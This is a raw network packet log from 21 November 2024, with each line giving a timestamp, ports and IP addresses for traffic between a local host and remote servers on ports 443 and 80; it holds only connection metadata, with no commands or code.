                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.946043968 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.946229935 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.946250916 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.946279049 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.946551085 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.946671963 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.946698904 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.946805954 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.948190928 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.948246002 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.992574930 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.992588997 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.992614985 CET49846443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.007441044 CET4434984913.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.007494926 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.007774115 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.008125067 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.008270979 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.009087086 CET49846443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.009344101 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.010225058 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.010247946 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.011404991 CET4434985013.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.011939049 CET49849443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.011955976 CET4434984913.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.013053894 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.013140917 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.013477087 CET4434984913.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.013547897 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.013572931 CET49849443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.013585091 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.013756037 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.013916969 CET49846443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.019714117 CET49849443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.019808054 CET4434984913.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.020224094 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.020303965 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.020709038 CET49850443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.020728111 CET4434985013.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.021061897 CET49849443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.021079063 CET4434984913.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.021224022 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.021236897 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.025038958 CET4434985013.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.025110006 CET49850443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.027206898 CET49850443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.027415037 CET49850443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.027420998 CET4434985013.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.051096916 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.051176071 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.051181078 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.051598072 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.051625967 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.051666975 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.051737070 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.052635908 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.052786112 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.052836895 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.053653955 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.053734064 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.053785086 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.054052114 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.054532051 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.054774046 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.054825068 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.054903030 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.055269003 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.055952072 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.056078911 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.056143045 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.057058096 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.057128906 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.057163954 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.057243109 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.058223963 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.058274031 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.058336020 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.058619976 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.059333086 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.059343100 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.059360981 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.059480906 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.059595108 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.059640884 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.060604095 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.060677052 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.060683012 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.060733080 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.061661959 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.061723948 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.061724901 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.061877966 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.062812090 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.062891960 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.062913895 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.062952995 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.063940048 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.064037085 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.064053059 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.064209938 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.065093040 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.065169096 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.065236092 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.065347910 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.066220999 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.066303015 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.066339970 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.066525936 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.067384958 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.067491055 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.067506075 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.067545891 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.068537951 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.068563938 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.068572998 CET4434984513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.068593979 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.068631887 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.068727016 CET4434984513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.068789005 CET49845443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.069691896 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.069814920 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.069941998 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.069989920 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.070826054 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.070893049 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.070916891 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.070982933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.071938992 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.072041035 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.072071075 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.072134018 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.072787046 CET49849443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.072793007 CET49850443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.072812080 CET4434985013.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.072841883 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.073121071 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.073229074 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.073276997 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.073276997 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.074274063 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.074345112 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.074376106 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.074461937 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.075400114 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.075479984 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.075501919 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.075700998 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.076524019 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.076569080 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.076617956 CET49845443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.076617956 CET49845443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.076627970 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.076668024 CET4434984513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.076694012 CET4434984513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.076714993 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.077708006 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.077831030 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.077843904 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.077888966 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.078805923 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.078846931 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.078932047 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.078989029 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.079976082 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.080075979 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.080113888 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.080113888 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.081110954 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.081242085 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.081250906 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.081310987 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.082262993 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.082324028 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.082334995 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.082545042 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.083358049 CET49865443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.083405972 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.083424091 CET4434986513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.083457947 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.083513021 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.083513021 CET49865443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.083570957 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.084551096 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.084577084 CET49865443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.084613085 CET4434986513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.084613085 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.084664106 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.084747076 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.085707903 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.085896969 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.086004019 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.086829901 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.086901903 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.086951971 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.087336063 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.088001013 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.088052034 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.088104963 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.088306904 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.089114904 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.089221954 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.089258909 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.089258909 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.089987993 CET4434985213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.090270996 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.090332985 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.090404987 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.090591908 CET49852443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.090607882 CET4434985213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.091197968 CET49852443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.091202021 CET4434985213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.091408014 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.091507912 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.091641903 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.092746019 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.092855930 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.092875957 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.093673944 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.093764067 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.093766928 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.093978882 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.094839096 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.094929934 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.094985008 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.095525026 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.095962048 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.096095085 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.096338034 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.097131968 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.097215891 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.097250938 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.097551107 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.098290920 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.098366976 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.098400116 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.098495007 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.099419117 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.099497080 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.099548101 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.099628925 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.100593090 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.100683928 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.100730896 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.101700068 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.101830959 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.101893902 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.102848053 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.102941990 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.102974892 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.103018999 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.104007006 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.104057074 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.104114056 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.104464054 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.105169058 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.105278969 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.105386019 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.106291056 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.106412888 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.106431007 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.106553078 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.107417107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.107537985 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.107718945 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.107853889 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.108580112 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.108686924 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:43.108783007 CET4977380192.168.2.5185.215.113.206
